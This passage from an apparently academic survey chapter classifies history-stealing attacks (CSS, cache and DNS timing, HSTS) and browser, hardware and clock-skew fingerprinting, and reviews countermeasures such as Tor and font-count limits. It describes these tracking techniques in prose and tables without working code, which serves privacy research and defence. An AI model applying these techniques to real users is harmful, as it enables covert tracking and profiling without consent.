G | Pawn task (Weinberg et al., 2011) | High | Low | CSS | Unknown | Partial history leakage
H | Jigsaw puzzle (Weinberg et al., 2011) | High | Low | CSS | Unknown | Partial history leakage
I | Webcam attack (Weinberg et al., 2011) | Moderate | Low | Flash, image acquisition and processing | Unknown | Partial history leakage
Table 3. Classification of timing-based history stealing techniques
ID | Attack | Accuracy | Speed | Technology | Countermeasures | Harm
J | DNS timing (Felten & Schneider, 2000) | High | Moderate | DNS (JS) | Unknown | Partial history leakage
K | Naive cache timing (Felten & Schneider, 2000) | High | Moderate | N/A | Unknown | Partial history leakage
L | Scripted naive cache timing (Felten & Schneider, 2000) | High | Moderate | JS | Unknown | Partial history leakage
M | Cache cookie (Felten & Schneider, 2000) | High | Moderate | JS | Unknown | The cache cookie allows tracking of the user
N | Enhanced cache timing (mansour, 2011) | Low | High | JS | Unknown | Partial history leakage
O | Enhanced cache timing (Zalewski, 2011) | Low | High | JS | Unknown | Partial history leakage
P | Cross-site timing (Bortz et al., 2007) | Depends on site | N/A | JS | Fixed-time requests; same-origin onerror and onload | Discovery of membership in an online service
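The decision rule behind the cache-timing attacks of Rows L and N-O can be sketched as follows. The threshold value is an assumption of ours, and the fetch callable stands in for whatever mechanism loads the test object (real attacks run inside the browser, not in Python):

```python
import time

# Sketch of the cache-timing decision (Rows L and N-O of Table 3). An object
# that loads well under the threshold is assumed to come from the cache,
# i.e., its hosting site has probably been visited before. The threshold
# value is a hypothetical cutoff between a cache hit and a network fetch.
THRESHOLD_S = 0.05

def probably_visited(fetch, url, threshold=THRESHOLD_S):
    start = time.perf_counter()
    fetch(url)                      # load the cacheable test object
    elapsed = time.perf_counter() - start
    return elapsed < threshold      # fast retrieval -> likely cached
```

The enhanced variants (Rows N-O) effectively invert this: they abort the load at the threshold and check whether it had already completed, which avoids polluting the cache and keeps the test repeatable.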
This algorithm is equal to a CSS-based attack with hyperlinks to domains belonging to the same category behaving the same way, which makes them indistinguishable for the attacker.

Early proposed countermeasures against automated CSS-based history stealing attacks include URL personalization (Jakobsson & Stamm, 2006) and history pollution (Jakobsson & Stamm, 2007). The first proposition alters all URLs under the domain according to a user-specific pseudonym, thereby making guessing URLs impossible. The second one would insert entries into the history that point to sites of a similar nature to those actually visited by the user; this way, the attacker cannot distinguish between fake and real history entries. Other authors proposed the extension of the same-origin policy to caching and visited link differentiation (Jakobsson et al., 2006).

N.b. that these defenses did not make automated CSS-based history stealing completely infeasible. However, in Firefox 4, the vulnerability was thoroughly patched in April, 2010 by making CSS behave similarly for visited and unvisited links (Baron, 2002), and also by removing certain CSS features (Baron, 2010; Stamm, 2010).

Interactive CSS-Based Attacks

Modern browsers inhibit classical CSS-based attacks; nonetheless, style sheets can still be applied to hyperlinks. If the user can be tricked into disclosing the applied style of a set of elements, history stealing can still be feasible, albeit at a lower speed and for fewer URLs (Rows E through I, Table 2). Weinberg et al. (2011) detail four attacks, all of which are meant to be disguised as CAPTCHAs (Completely Automated Public Turing test to tell Computers and Humans Apart; a puzzle that can easily be solved by a human, but is normally difficult for computer software). CAPTCHAs normally ask the user to, for example, recognize and type some slightly distorted rendered letters, or to provide the right answer to a dynamically generated, simple question, such as "How much is 2 + 2?"

The first of the four attacks shows words to the user, while the second one displays specially constructed characters on seven-segment displays. The user is asked to type all words or characters into a text field, which completes the attack. The first attack infers one visited URL per word, while a character represents four for the second attack. The third attack draws a chessboard, and maps each square to a URL. Then, a chess piece is drawn into a square if the corresponding URL is visited; otherwise, the square is empty. The user is then asked to click all squares where she sees a chess piece. Finally, the fourth interactive attack is similar to a jigsaw puzzle: the user must click on the pieces of which a composite picture is made up. These attacks work, but at a very low URL detection speed; therefore, they are less viable for general profiling, but may be used in some targeted attacks (e.g., in phishing attacks).

Side-Channel CSS-Based Attacks

Miscellaneous methods include the webcam attack (Weinberg et al., 2011), which renders visited links with a blinking style, and recognizes this by processing images recorded with the user's Web camera (Row I, Table 2). Obtaining permission to use the Web camera may be problematic, but the required image processing algorithm is not very complex (although a simple, homogeneous background may be required behind the person using the computer).

Leaking History Through Security Policies

HTTP Strict Transport Security (HSTS) defines an HTTP header that forces the browser to initiate a secure HTTPS connection to a Website that was originally requested through plain HTTP. The browser stores this setting, so that subsequent requests are made via HTTPS. Previously we mentioned that this functionality can be exploited to store an identifier, but also to leak history (Davidov, 2011).

For storage purposes, an adversary can "burn in" a unique alphanumerical identifier into the browser as a set of HSTS policy entries (that is, through subdomains under the control of the attacker) and query it later on. Upon retrieval, the browser will initiate an HTTPS connection for the "right" domains only. This mechanism can be used similarly to determine visited links where such a setting was used. One can think of this algorithm as a mixture of a tracking cookie and history stealing. However, it is arguably more effective than that, since HSTS policy entries are meant to stay in the browser for a long time. A viable countermeasure would be to enforce a single policy for all subdomains.

Summary of History Stealing Attacks

In the empirical study of Jang et al. (2010) over the Alexa top 50,000 sites, it was shown that 485 sites inspected the style properties of elements that could leak browser history. Out of these sites, 46 confirmedly performed the classical, JavaScript-enhanced, CSS-based history stealing, and then transferred the result to some server; 36 of them used "off-the-shelf" history stealing code from third-party domains. A further 326 sites inspected a vast number of domains, but Jang et al. could not confirm that the history information was sent to any server.

We have summarized the key features of all attacks discussed hitherto in Table 2 and Table 3; we have separated query-based and timing-based attacks (see our taxonomy) for better clarity. The following properties are listed for each attack:

Accuracy: High accuracy means few or zero false positives and false negatives; it can be seen that most attacks belong to this category. However, both the construction and accuracy of cross-site timing are highly dependent on the site to be attacked, and therefore a general result cannot be given for it. Moreover, privacy-preserving history mining is moderately accurate on purpose. The webcam attack is, however, moderately accurate per se, according to Weinberg et al. (2011). Other attacks by the same authors are highly reliable for a compliant user. Finally, the result of enhanced cache timing is based on our very limited experiments; in other setups, the attacks might perform better.

Speed: Most variants of classical, CSS-based history stealing can query hundreds of thousands of URLs per minute, while hundreds may be feasible with cache-based attacks (except the newer, enhanced ones). Obviously enough, attacks that require user interaction have the lowest speed. We have not been able to determine the speed of cross-site timing attacks, and we find the two sites tested by Bortz et al. too few to draw a conclusion.

Technology: Here we enumerate the technologies that are used by the attacks. We have not included self-evident ones, such as HTTP or TCP/IP.

Countermeasures: Here we enumerate the countermeasures that can be used to defeat (or at least cripple) an attack. Again, we have not included any self-evident methods (such as deleting the browsing history and/or the cache of the browser, disabling JavaScript in order to avoid JavaScript-based attacks, or covering the Web camera in order to defeat webcam attacks), so "unknown" does not always imply that the user is powerless; then again, many of these countermeasures do not allow a fine-grained tradeoff between browsing experience and privacy, so the implementation of better defenses might be desirable. By "Baron's defenses," we mean all countermeasures discussed by Baron (2010) and later implemented as a bug fix (Baron, 2002), that is, making the style that is applied to hyperlinks inaccessible to JavaScript programs, modifying the way CSS styles are applied to hyperlinks, and disabling certain CSS features.

Harm: In this column, we list the consequences of a successful execution of each attack, i.e., how detrimental it is to the privacy of the user.

FINGERPRINTING ON THE WEB

Fingerprinting is an emerging, storageless identification technique on the Web, replacing storage-based techniques. When the client device is being fingerprinted, a reproducible, unique identifier is calculated, which can with high probability be easily recalculated during a subsequent visit or when visiting another site, even if all client-side storages are cleared. Various information can serve as a basis of fingerprinting, such as hardware parameters, unique features in network communication (e.g., the IP address or timing), or software settings and capabilities (such as OS brand, list of installed plugins, or browser agent information). Regardless of the considered features, economically valuable fingerprinting techniques should not be sensitive to changes in the attributes taken into account during identification.

Although both history stealing and fingerprinting techniques are storageless, we argue that it makes sense to differentiate between them, as the former are based on state (browsing history, caches, etc.), while the latter are setting- and attribute-based. The principal difference is that the client state can be influenced by the attacker and by Websites (this is why client state can be exploited to operate as a storage, e.g., in the case of operational caches), but attributes and settings can only be changed by the user. This classification is further refined in a subsequent section.

Probably the earliest fingerprinting attempt used for identification was mentioned in the thesis of Mayer (2009), and the Panopticlick project (Eckersley, 2010) was the first empirical experiment on a large user base. There are even earlier fingerprinting attempts, like the passive OS fingerprinting of Miller (2002), or tools such as the browser identification tool Browserrecon (Ruef, 2008), which used HTTP request headers for identification; however, these rather focused on revealing real device and software attributes (i.e., discovering the OS type and the user agent string, respectively; also called OS and application fingerprinting), instead of measuring uniqueness and large-scale identifiability. Although these are not applicable for tracking, they can be used for detecting client attributes, as an additional source for another type of fingerprinting.
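The HSTS storage trick described under Leaking History Through Security Policies can be illustrated with a small sketch. The domain layout, bit width, and function names are our own assumptions, not a published implementation:

```python
# Sketch of the HSTS storage trick (Davidov, 2011): each bit of an
# identifier is mapped to one attacker-controlled subdomain; a set bit is
# "written" by making the browser record an HSTS policy for that subdomain.
# On readback, the plain-HTTP requests that the browser upgrades to HTTPS
# reveal the set bits. Domain names below are placeholders.
N_BITS = 16

def subdomains_to_set(identifier: int):
    """Subdomains for which an HSTS policy must be planted."""
    return {f"b{i}.tracker.example"
            for i in range(N_BITS) if (identifier >> i) & 1}

def read_identifier(hsts_state: set) -> int:
    """Reconstruct the identifier from observed HTTPS upgrades."""
    ident = 0
    for i in range(N_BITS):
        if f"b{i}.tracker.example" in hsts_state:   # request was upgraded
            ident |= 1 << i
    return ident
```

The countermeasure mentioned above, a single policy for all subdomains, destroys exactly this per-subdomain addressability.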
Shortly after the Panopticlick project was published, companies started to switch from cookie-based to fingerprinting-based tracking techniques (Marshall, 2011), since fingerprinting works even in the case of privacy-conscious users who delete cookies regularly and use private mode; in both cases, these efforts are useless against fingerprinting (Boda et al., 2012). We must note, though, that some companies, such as 41st Parameter, had used fingerprinting even before the thorough academic analysis began (Eckersley, 2010). In addition, the EU regulation on tracking cookies, often referred to as the "cookie law," merely added fuel to the fire, since it prohibited the use of all kinds of storages for tracking unless the user consented (Loveless, 2011), and inspired advertisers to seek ways of circumvention.

Nowadays, several companies, such as BlueCava Inc., Iovation Inc., and 41st Parameter, offer fingerprinting-based behavioral tracking, claiming to provide device identification applicable to all kinds of devices; however, some trackers use fingerprinting only as a complementary solution to regular techniques, as in the case of TradeDoubler, where the device fingerprint is calculated as a hash of the user agent string and the IP address, and then used to track ad clicks (Wramner, 2011).

In this section, we review fingerprinting techniques, the related anonymity paradox (i.e., when forged information makes the subject stand out from the crowd even more than without it), and possible defenses from the literature. We rigorously focus on technology-based solutions; however, there is another type of fingerprinting that may be incorporated into business practices in the future: biometry-based fingerprinting. There is scientific evidence that real-life behavior and human-computer interaction can be used for biometrical identification (Yampolskiy & Govindaraju, 2008); it has already been shown that typing patterns are personally identifying (Chairunnanda et al., 2011), and even mouse movement fingerprinting is possible (Feher et al., 2012). We believe that, in the near future, similar techniques with wider-scale use will emerge on the market of tracking.

Information-Based Fingerprinting Techniques

Information-based fingerprinting techniques query and collect high-level client attributes (reading values of variables and constants, or measuring certain characteristics) and settings for fingerprinting (e.g., from the OS or the browser). Here we review the most relevant information-based fingerprinting techniques, and the related countermeasures.

One of the earliest fingerprinting techniques, Browserrecon, targeted the family and version of the browser agent. Browserrecon regarded the user agent string as potentially fake, and instead inspected the sent HTTP headers, as the header lines and their values differ for each browser family, sometimes even between versions. Norbert (2011) confirms this for Firefox, and in addition mentions a method of distinguishing Firefox from other browsers, as it is the only browser that makes a second request for the favicon if it is not found the first time.

Occasionally, particular (or even identifying) information is sent through the headers. For example, an installation of Microsoft Office causes changes to the Internet Explorer HTTP accept headers (Wramner, 2011); as another example, some mobile ISPs intentionally leak private information (such as mobile phone numbers or roaming status) of their subscribers through the request headers (Mulliner, 2010). However, headers need to be augmented with additional information for effective, wide-scale fingerprinting, in order for them to be suitable for tracking. In their work, Yen et al. (2012) analyzed millions of hosts who visited the Hotmail and Bing services, and concluded that 80% of users can be tracked by simply using the user agent strings augmented with IP prefix information as an identifier.

The thesis of Mayer (2009) was the first step towards classic information-based fingerprinting.
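A minimal sketch of the identifier studied by Yen et al. follows; the choice of a /16 prefix and of SHA-256 is our illustrative assumption, not necessarily the authors' exact construction:

```python
import hashlib

# Sketch of a host identifier in the spirit of Yen et al. (2012): the user
# agent string combined with an IP prefix. Using the first two octets and
# SHA-256 here is an assumption made for illustration.
def host_key(user_agent: str, ip: str) -> str:
    prefix = ".".join(ip.split(".")[:2])            # first two octets only
    return hashlib.sha256(f"{prefix}|{user_agent}".encode()).hexdigest()
```

Note that a prefix (rather than the full address) keeps the key stable across DHCP reassignments within the same network, which is presumably what makes it useful for tracking.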
In his experiment, a test site was run, where the navigator object, screen resolution, list of plugins, and acceptable MIME types were hashed together to create the browser fingerprint. Although only 1,328 clients were measured, this experiment showed the potential of fingerprinting, as unique fingerprints were obtained in 96.23% of all cases. It also turned out that the plugin and MIME type lists provided by Mozilla- and WebKit-based browsers yield additional entropy for fingerprinting. Eckersley showed that the same holds for Flash- and Java-based font detection (Eckersley, 2010).

Making use of the underlying principles, the Panopticlick project was designed to test the uniqueness of browser fingerprints on a larger scale (i.e., to determine the commercial viability of such fingerprinting methods (Eckersley, 2010)). During the experiment, the uniqueness of different attributes such as the user agent string, screen resolution, and font and plugin lists was measured, and the self-information of combined attributes was also measured, but not the joint entropy of correlating attributes, as Perry et al. (2011) note. Until the beginning of the analysis, the project had gathered 286,777 fingerprints, of which 94.2% were unique if plugins were enabled (and only a further 4.8% had anonymity sets of at least two users), and Eckersley provided a simple but precise algorithm that can follow changes in fingerprints (e.g., due to browser or plugin updates) with an accuracy of 99.1%.

The Panopticlick project inspired the idea of cross-browser fingerprinting (Boda et al., 2012), where two major improvements were made. Panopticlick used attributes that were browser-dependent (e.g., the user agent string), and it was also plugin-dependent, since precise results were provided only by using either Flash or Java to collect font lists (which is a rather important source of entropy). Although Eckersley (2010) mentioned CSS-based font enumeration, the work of Boda et al. (2012) is the first known attempt to implement JavaScript and CSS-based font detection for fingerprinting.

Moreover, the list of queried fonts was chosen as the basis of identification, based on the following assumption: the list of installed software on a computer is unique, and so is the list of available fonts, since new applications can silently install fonts, too. Therefore, fingerprints were hashed from the first two octets of the IP address, the screen resolution, the time zone, and some selected fonts, where all attributes were browser-independent (see Figure 4). The font feature set was created in a way that eliminates uncertain and browser-dependent fonts, as some fonts behave differently in different browsers.

In a 6-month period of collection, a total of 989 fingerprints were obtained, with which it was shown that JavaScript-based font detection was sufficient for unique identification (at least for Windows and MacOS systems); however, due to the low number of fingerprints created in multiple browsers in parallel, the cross-browser property has remained a mere concept. This inspired the Cross-browser fingerprinting test 2.0 (2012) as an attempt to prove the viability of such tracking. The basic concepts remained the same, but there were some changes: the font feature list was refined (based on lessons learned from the first test), the first two IP octets were omitted, and an evercookie was optionally set to support future analysis (for which some additional info is also collected but not included in the fingerprint, such as the list of plugins).

There are several other fingerprinting experiments similar to Panopticlick and the cross-browser fingerprinting test, but we chose to omit them, as we deemed that they did not deliver groundbreaking novelties; however, there are fundamentally different ones that are worth mentioning. Whitelist fingerprinting (Mowery et al., 2011) is an attack against Firefox with the NoScript extension installed. NoScript allows users to completely block JavaScript, unless the site in question is included on a whitelist.
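The browser-independent attribute set of Figure 4 suggests a fingerprint function along the following lines; the normalization and the hash choice are our assumptions, not the exact construction of Boda et al.:

```python
import hashlib

# Sketch of a cross-browser fingerprint in the spirit of Boda et al. (2012):
# only system-level (browser-independent) attributes are hashed, so the
# same device yields the same value in different browsers. Normalization
# details (sorting fonts, SHA-1) are illustrative assumptions.
def cross_browser_fingerprint(ip, screen, timezone, fonts):
    ip_prefix = ".".join(ip.split(".")[:2])         # first two octets only
    basis = "|".join([ip_prefix, screen, timezone, ",".join(sorted(fonts))])
    return hashlib.sha1(basis.encode()).hexdigest()
```

Sorting the font list makes the value independent of enumeration order, which may differ between the Flash-, Java-, and CSS-based detection paths.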
Figure 4. Single vs. cross-browser fingerprint: values need to be filtered to obtain system-specific (not browser-specific) information as an input for the fingerprint
The rationale behind the algorithm is that the user is likely to whitelist sites of her interest that would not work with blocked JavaScript. The attack embeds a JavaScript program into a Web page and checks for hallmarks of a successful execution. For a large set of domains, the pattern of "whitelist hits" may be enough to fingerprint a user, but the efficiency of this fingerprinting scheme on a large user base is not known. Another problem of the attack is its small-scale usability.

Reschl et al. (2011) discuss a fingerprinting method that aims to discover the version of the browser by examining the behavior of the JavaScript implementation. Globally available JavaScript test suites are used to discover the exact browser version. In a survey with 189 participants, the test suite ran in 90 ms on an average PC and 200 ms on a smartphone, and identified supported browser versions with an accuracy of 100%; this claim was verified by inspecting the UAS of the browser and by asking the user about the exact version of the browser. Arguably, this information alone is too little for unique identification, but it may be used as an additional source in tracking methods. Norbert (2011) proposes to use somewhat rarely used JavaScript calls like arguments.callee().toString() to discover subtle differences between the JavaScript implementations of browsers.

Mowery et al. (2011) constructed another browser and OS fingerprinting algorithm, but based it on off-the-shelf JavaScript test scripts (i.e., benchmarks). The accuracy of guessing the browser family was 98.2%, and guessing the correct browser version was successful in 79.8% of all cases. The operating system fingerprinting was performed within a chosen browser version,
namely Firefox 3.6. Versions of Windows (7, Vista, and XP) could be distinguished with an accuracy of 98.5% (due to the lack of volunteers, other systems were not measured).

Hardware and Network Level Fingerprinting Techniques

Besides browser and OS fingerprinting, Mowery et al. (2011) also discussed a CPU architecture fingerprinting algorithm that had a success rate of 45.3%. This is not very precise, and it has as long a runtime as their OS and browser fingerprinting technique. That said, hardware fingerprinting is also possible by looking for minor differences between images rendered by different hardware onto the HTML5 canvas (Mowery & Shacham, 2012).

Kohno et al. (2005) experimented with fingerprinting computers based on the clock skews they exhibit. The skew of two clocks is defined as the difference between the rates with which they advance. Two attacker models are discussed: one where the clock skew is calculated for TCP timestamps, and one where the attacker bombards the fingerprinted computer with ICMP Timestamp Requests and estimates the skew of the system clock based on the values in the incoming ICMP Timestamp Replies. According to Kohno et al., the TCP timestamp-based fingerprint remains stable even if the attacked computer frequently synchronizes its system clock with a Network Time Protocol (NTP) time server. Furthermore, both methods yield similar results.
Huang et al. (2012) applied clock-skew measurement to client device identification in cloud environments; the so-estimated clock skew is largely independent from the network medium, and the only notable exception is the use of a virtual machine, which produces a different (but stable) clock skew upon every reboot. Furthermore, Huang et al. conducted an experiment with 100 devices, and found that the false negative and false positive rates are at most 8%.

However, we would like to highlight that the applicability of the algorithm for its original purpose of enhancing authentication is somewhat questionable, as at least 200 AJAX requests are required to get a meaningfully precise clock skew estimate, which takes 16.7 minutes. We argue, however, that the algorithm can successfully and clandestinely fingerprint a user if the attacker's Web page is kept open for a long time (e.g., when reading a news site or taking a coffee break, but not when logging in to a webmail service).

Yen et al. (2009) try to identify browser families based on other types of summarized traffic metadata of information flows. They examine 9 features of TCP connections (e.g., their byte count and duration). Firstly, the authors tested their classification method on a data set comprising traffic from Windows-based hosts. The algorithm was tested on data originating from a single browser instance, and trained on the rest of the data set. It was found that the correct browser family could be identified with a precision of at least 71%, but even 100% was achievable after slight adjustments to the parameters. Then, the algorithm was also tested in a real-world-like scenario, where the precision of classifying Firefox and Opera browsers was calculated for several parameters, and it peaked at 74.56%.

In our opinion, this algorithm can probably be extended to several browser families (and possibly versions), as implied by the authors. However, requiring the summary of a vast amount of data imposes a lower bound on the capabilities of the attacker. As far as possible countermeasures are concerned, it might be possible to make the browser "randomize" its traffic characteristics (e.g., varying the number of resources that are fetched in one go), but that could possibly introduce inconsistencies into the user experience.

The Anonymity Paradox: Use Camouflage with Wisdom

Before discussing defenses against fingerprinting, we should mention the anonymity paradox (i.e., when one's efforts result in even stronger identifiability instead of preserving her privacy). Let us imagine that, as a means of protection, someone changes the user agent string of the browser to an empty string. This clearly preserves some privacy as it prevents information loss, but it is also likely that it uniquely identifies her (and makes her traceable), since such user agent strings are not very common. This is like putting on a ski mask in a bank; if you are the only one doing this, you are anonymous, but also in focus (and very likely to be caught). See Figure 5 for a fingerprinting-related example.

Eckersley (2010) brings up Privoxy users as examples, whose user agent strings had 15.5 bits of identifying information alone. Similarly, browsing the Web with Tor can also be a marker for fingerprinting, according to the measurements of Huber et al. (2010), who found that only 22% of Tor users used TorButton to browse the Web. Perry et al. (2011) go even further and state that every single altered option can be used for fingerprinting; for example, user-customized filters can be suitable targets, just as in the case of whitelist fingerprinting.

In connection to fingerprinting, such and similar phenomena (that is, when client state is altered in order to protect privacy, but due to the low user base doing the same it achieves identification rather than anonymity) are referred to in the literature as the Panopticlick or the fingerprinting paradox (The Simple Computer, 2012; Broenink, 2012), and are also discussed in Eckersley (2010) and Perry et al. (2011). However, this concept can be generalized beyond fingerprinting, and can occur
Figure 5. The anonymity paradox illustrated: camouflaging is not enough, as anonymity set size also matters. Three visitors used a counter-fingerprinting technology, masking themselves as Firefox 15 users. However, one of the visitors used unusual camouflage settings, which made her identifiable and trackable, while the others had an anonymity set size of 2.
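The caption's notion of anonymity set size can be made concrete by counting, for each visitor, how many observed visitors share her fingerprint. A minimal sketch, with made-up fingerprint strings:

```javascript
// Sketch of the idea behind Figure 5: a camouflaged attribute value only
// protects a visitor if enough other visitors share the same fingerprint.

function anonymitySetSizes(observedFingerprints) {
  const counts = new Map();
  for (const fp of observedFingerprints) {
    counts.set(fp, (counts.get(fp) || 0) + 1);
  }
  // Each visitor's anonymity set is the number of visitors that are
  // indistinguishable from her (including herself).
  return observedFingerprints.map((fp) => counts.get(fp));
}

// Three visitors masquerading as Firefox 15, one with unusual settings:
const visitors = [
  "Firefox 15|1920x1080|UTC+1",
  "Firefox 15|1920x1080|UTC+1",
  "Firefox 15|640x480|UTC-9", // odd camouflage: anonymity set size of 1
];
console.log(anonymitySetSizes(visitors)); // [ 2, 2, 1 ]
```

An anonymity set size of 1 means the camouflage itself became the identifier, which is exactly the anonymity paradox.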
in other scenarios while using privacy enhancing technologies (PETs); thus we call it the anonymity paradox.

Therefore, substitution values must be chosen carefully, or should be used by a sufficient number of people. Attributes should blend the device into the mass of others to achieve anonymity, and multiple attributes regarded together should be chosen carefully. As an example of the latter, an iOS Safari user agent string coupled with a resolution of 1280x1024 does not sound very realistic, and provides a good source of information for identification, too. In addition, one should consider the possibility of session linkability, and should not change values randomly too often (e.g., at every page load).

Defending Against Fingerprinting Attacks

One needs to consider many aspects in order to achieve unobservability of her actions against fingerprinting attacks; first of all, as a starting point, it is presumed that no regular attacks will work against her (including IP-based tracking). Therefore, for the sake of simplicity (from the user's viewpoint), we propose the use of off-the-shelf solutions created by professionals, such as the Tor Browser Bundle (Tor, 2012) or JonDoFox with JonDo Proxy (JonDo, 2012), as both provide network-level anonymization as well as protection against most regular tracking techniques and privacy-violating attacks. In addition, the developers of both seek solutions to avoid fingerprinting attacks, too.

Particularly suspicious users may use static virtual machine snapshots (burnt to a DVD or reverted regularly) to protect their system against tracking (The Simple Computer, 2012), which also provides some protection against clock skew attacks as described previously, but, of course, this requires a sacrifice of some comfort. However, we note that in case of bad configuration, such systems provide a static fingerprint for tracking their user.

Customizing the Browser

For some reason, there are users who do not want to use complex solutions as previously discussed, but prefer to build their own compilations instead (e.g., to add PETs as extensions to the Web browsing applications they use every day). There are many browser and system parameters to cover (e.g., time zone, user agent string, language and character
set settings, accepted content types, headers), and there are some which cannot be masked without serious investigation and cumbersome hacking. For instance, information related to screen and content window resolutions needs to be reduced, as this option alone is estimated to leak 29 bits of identifying information (Perry, 2011b), but a list of "talkative" attributes may be further convincing (e.g., JonDo Test, 2012).

In conclusion, in our opinion, building a custom software package seems futile, as a complete solution requires building an anonymous Web browser (Gulyás et al., 2008) with several extensions and modifications. We agree with Perry et al. (2011), who stated that "each option that detectably alters browser behavior can be used as a fingerprinting tool," and we just highlight whitelist fingerprinting again (Mowery et al., 2011) as an example.

Protection against JavaScript Engine Fingerprinting

Unfortunately, none of the discussed JavaScript-based fingerprinting algorithms are trivial to protect against (Norbert, 2011; Reschl et al., 2011). However, some attacks seem less threatening, even if we take the lack of effective countermeasures into consideration, as they are not feasible to be used in real-life situations. As a drawback of the fingerprinting suite of Mowery et al. (2011), its runtime of several minutes seems to be prohibitive, bar for Web pages that are normally left open for a long time (e.g., news sites). Mowery et al. argue that it might be possible to reduce the delay between the individual test scripts, which would result in a more universally usable algorithm.

We argue that functional aspects, such as which JavaScript test cases fail or execute in a certain timeframe, will always reveal the subtle differences between browser families and eventually (as bugs get fixed and JavaScript engines evolve) versions within a family, too. This is inevitable, unless all browsers include the exact same JavaScript interpreter; however, this would probably seriously impede competition between browser vendors, as well as innovation.

One way of avoiding fingerprinting based on the characteristics of the JavaScript engine would be to allow the user to choose the implementation at will (e.g., with a browser extension). Of course, this is hardly viable between different browser families, and outright impossible for the engines of closed-source browsers. Furthermore, this approach would possibly expose the user to security vulnerabilities of certain old JavaScript interpreters, or break the functionality of some Web pages that are optimized for a certain version of an engine.

Recent Developments on Protecting the Font List

The entropy of the font list was found to be 13.9 bits in the Panopticlick experiment, having the second highest value of all inspected attributes (Eckersley, 2010). Due to this finding, and the fact that fonts can be detected in multiple ways (via Flash, Java or JavaScript), fonts are likely to play an important role in fingerprint-based tracking. In addition, fonts also significantly influence the user experience of Web browsing, and therefore it is not possible to restrict the browser to a handful of fonts (or at least such a modification will not be accepted by the majority of users).

Firefox offers a simple option to restrict all possible fonts to a selection of four (i.e., Content > Fonts & Colors > Advanced > Allow pages to choose their own fonts), which also helps in impeding font-based fingerprinting, but it is not a very user experience-friendly solution. Therefore, it seems most likely that Firefox will apply a patch to this solution (Viecco, 2012), which was developed for the Tor browser (Perry, 2011a). The latter includes two novel options, namely browser.display.max_font_count and browser.display.max_font_attempts, to limit the number of fonts and font load attempts, regulated on a per page load basis (currently, test values are set as 5,
10, respectively). This method limits JavaScript-based detection only; therefore, the affected plugins need to be disabled.

For the problem of session linkability, we suggest further modifications, as an attacker can test different fonts during sequential page loads. It is not likely that font lists collected this way would have a high entropy (at least for tracking by font lists only), but they can be regarded as a significant additional entropy source. Therefore, we propose to use these options in a per-domain setting, with a user interface for the necessary interaction (e.g., clearing the cache of previously loaded fonts), which would not allow loading new fonts if the user navigates to a new page on the same domain.

The FireGloves add-on is a proof-of-concept utility (i.e., not a standalone extension providing enhanced privacy) aiming to show a compromise between good user experience and fingerprintability; thus it chooses a different approach to disable font-based fingerprintability, namely rewriting the offsetWidth and offsetHeight getters in order to prohibit JavaScript font detection (FireGloves, 2012). Although it has problems on some pages, it offers a usable alternative; however, the solution in the Tor Browser with a per-domain setting would admittedly embody a better solution.

Defending Against Low-Level Fingerprinting Attacks

Protecting users against the threats of these fingerprinting attacks is hard. Hardware-based techniques such as font rendering-based fingerprinting can hardly be defeated from a browser, as the fingerprintable information is provided by low-level software, such as the driver of a GPU, or a layer of the operating system. Clock skew is another example of a system feature that is out of the reach of the browser. Of course, certain features of the browser (such as the number of objects that are fetched in a single TCP session, or the content of HTTP request headers) can be manipulated, but it might impose some (possibly hard-to-predict) changes on user experience.

Taxonomy for Storageless Tracking Techniques

To the best of our knowledge, this is the first taxonomy provided for storageless tracking techniques. More precisely, we classify techniques using a single type of source at once; however, techniques using multiple sources may emerge in the future (e.g., hardware-level fingerprinting combined with browser functionality). Basically, there are three types of sources to take into account: state information (e.g., caches), attributes (e.g., screen resolution, font list, functionality testing) and settings (e.g., cookies enabled or not, whitelists).

In our taxonomy (depicted on Figure 6), first we differentiate history stealing from fingerprinting techniques by the fact that the former are strictly state-based: history stealing attacks aim to extract state information from the client (i.e., from the user's device or software (browser, OS, etc.)). As the state of the client changes during browsing of the Web, it can also be altered by the attacker in order to exploit it as a storage (e.g., the HSTS cache). This is the same reason why it is not used for fingerprinting, as it can change frequently. Attacks discussed under history stealing can additionally be categorized as either query-based or timing-based attacks.

We furthermore divide fingerprinting into low-level and information-based subclasses. Exactly as discussed in this chapter, low-level fingerprinting sources incorporate hardware- and network-level fingerprinting techniques, and the rest of the tracking techniques constitute the group of information-based fingerprinting methods. In addition, we distinguish single-browser and cross-browser fingerprinting techniques, and classify the discussed procedures as on Figure 6. As an alternative, it is possible to distinguish information-
Figure 6. Taxonomy of the storageless tracking techniques
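As a rough illustration (not part of the chapter), the decision structure of the taxonomy in Figure 6 can be written down as a small classification function; the field names (source, method, lowLevel, crossBrowser) are invented for the example:

```javascript
// A compact rendering of the taxonomy of Figure 6.

function classify(technique) {
  if (technique.source === "state") {
    // Strictly state-based techniques are history stealing attacks,
    // further split by how the client state is extracted.
    return "history stealing / " + technique.method + "-based";
  }
  // Attribute- and setting-based techniques are fingerprinting.
  const level = technique.lowLevel ? "low-level" : "information-based";
  const scope = technique.crossBrowser ? "cross-browser" : "single-browser";
  return "fingerprinting / " + level + " / " + scope;
}

console.log(classify({ source: "state", method: "timing" }));
// history stealing / timing-based
console.log(classify({ source: "attributes", lowLevel: false, crossBrowser: true }));
// fingerprinting / information-based / cross-browser
console.log(classify({ source: "attributes", lowLevel: true, crossBrowser: false }));
// fingerprinting / low-level / single-browser
```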
based fingerprinting techniques as passive or active, based on whether they query client-side information (via JavaScript) or solely use information automatically revealed by the browser (Broenink, 2012; Mayer & Mitchell, 2012). In our opinion, browser-dependency is more important than this attribute, and therefore we defined our taxonomy accordingly.

CONCLUSION: IS THERE ROOM FOR COOKIELESS TRACKING?

As we highlighted in the chapter discussing the current state of the advertising and tracking business, it is entirely clear that the industry will not abandon tracking in response to user countermeasures, but will rather switch between technologies to bypass the self-helping attempts of privacy-conscious users and also to avoid related regulations. Users are not as aware of fingerprinting technologies as of cookie- and other storage-based techniques, and, consequently, this favors fingerprint tracking. There are even tracker companies who advertise their service as a solution for companies affected by the "cookie law" in the EU (BlueCava, 2012). Therefore, we expect that trackers will favor fingerprint-based tracking over other techniques.

However, going forward, regulation will hit fingerprint-related tracking, too (at least in the EU), but the industry will no doubt find a way to circumvent these regulations. For instance, it is not possible to forbid sites to query browser attributes entirely, since some are necessary for everyday operation. Even if these attributes are left out of the fingerprint measurements, either because of regulation or technical barriers, passive fingerprinting can still be used for tracking. Therefore, we conclude that, regarding the current scenario, it is most likely that fingerprinting will spread among trackers, and in places having behavioral advertising and tracking regulations in effect, a longer battle will take place.

